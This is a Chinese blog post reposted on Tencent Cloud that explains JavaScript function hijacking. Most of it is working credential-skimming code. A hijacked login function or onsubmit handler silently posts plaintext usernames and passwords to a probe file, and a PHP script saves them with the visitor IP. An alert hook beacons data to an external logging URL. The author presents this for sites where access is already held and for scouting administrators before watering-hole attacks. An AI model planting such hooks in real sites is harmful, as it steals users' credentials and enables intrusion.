JavaScript 函数劫持攻击原理
JavaScript 函数劫持(javascript hijacking)简介
一个简单的示例如下,主要逻辑就是,用变量 _alert保存原函数 alert,然后重写 alert 函数,在重写的函数最后调用原函数。这样得到的一个效果就是调用 alert 的时候,可以往 alert 中加入其它操作。比如如下代码中进行一个赋值。
<script type="text/javascript">
var _alert = alert;
alert = function(){
var str = "啥也不是";
_alert(str);
}
alert();
</script>日志记录
这种编程技巧常用于开发中的日志收集与格式化。既然可以劫持函数加入自己的操作,那么就可以在比较隐蔽的执行一些猥琐的操作。比如
https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html
一文中提到的通过 Hook alert 函数来记录调用情况,或者弹一些警告信息,这样就可以记录到测试者的网络出口ip、浏览器指纹等信息也加上,没准就是日后的呈堂证供。
<script type="text/javascript">
function log(s) {
var img = new Image();
img.style.width = img.style.height = 0;
img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s);
}
var _alert = alert;
window.alert = function(s) {
log(alert.caller);
_alert(s);
}
</script> 探针
在某些场景下,比如:已有权限,但是数据库中密码是加密的,无法解开。又或者需要探测目标人员访问此网站的规律。此时就可以利用劫持登录函数来记录明文的账号密码。如下示例:
onclick 事件会调用 login 函数发送请求包:
<form id="form1">
<input type="text" id="username" name="username"/><br>
<input type="password" id = "password" name="password"/><br>
<button id="submit" onclick="login()">submit</button><br>
</form>
<script>
function login(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
$.ajax({
url:"login.php",
type:"POST",
data:{
"username":username,
"password":password
},
success:function(){
alert(1);
},
error:function(){
alert("error");
}
});
}
</script>可以劫持 login 函数,在发送登陆请求前,先发到探针文件中做一些记录帐号密码等操作。
var _login=login;
login = function (){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
$.ajax({
url:"log.php",
type:"POST",
data:{
"username":username,
"password":password
},
success:console.log("1"),
error:function(){
alert("error");
}
});
}log.php 的内容如下:
<?php
$username = $_POST["username"];
$password = $_POST["password"];
$ip = $_SERVER['REMOTE_ADDR'];
file_put_contents("./log.txt",$username." ".$password." ".$ip);也许在实际中更常见的表单形式应该是下面这种。
<form id="form1" method="POST" action=“login.php”>
<input type="text" id="username" name="username"/><br>
<input type="password" id = "password" name="password"/><br>
<input type="submit" id="submit" name="submit"/><br>
</form>这种表单也可以通过小小的改动,很简单的记录到信息,下面使用的是 onsubmit 事件,用如下方式即可:
<script src="http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"> </script>
<body>
<form id="form1" method="POST" action=“login.php” onsubmit="return _login()">
<input type="text" id="username" name="username"/><br>
<input type="password" id = "password" name="password"/><br>
<input type="submit" id="submit" name="submit"/><br>
</form>
<script>
function _login(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
$.ajax({
url:"log.php",
type:"POST",
data:{
"username":username,
"password":password
},
success:true,
error:true
});
}
</script>不仅可以记录密码,还可以结合前面提到的记录日志,来记录管理员的登录时间、IP、UA 和浏览器指纹等信息。这种探针常用于布置水坑攻击前针对人员登录情况的信息收集,根据收集的信息制定具体的水坑方案。顺便吐槽一句IE 辣鸡。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-04-06,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
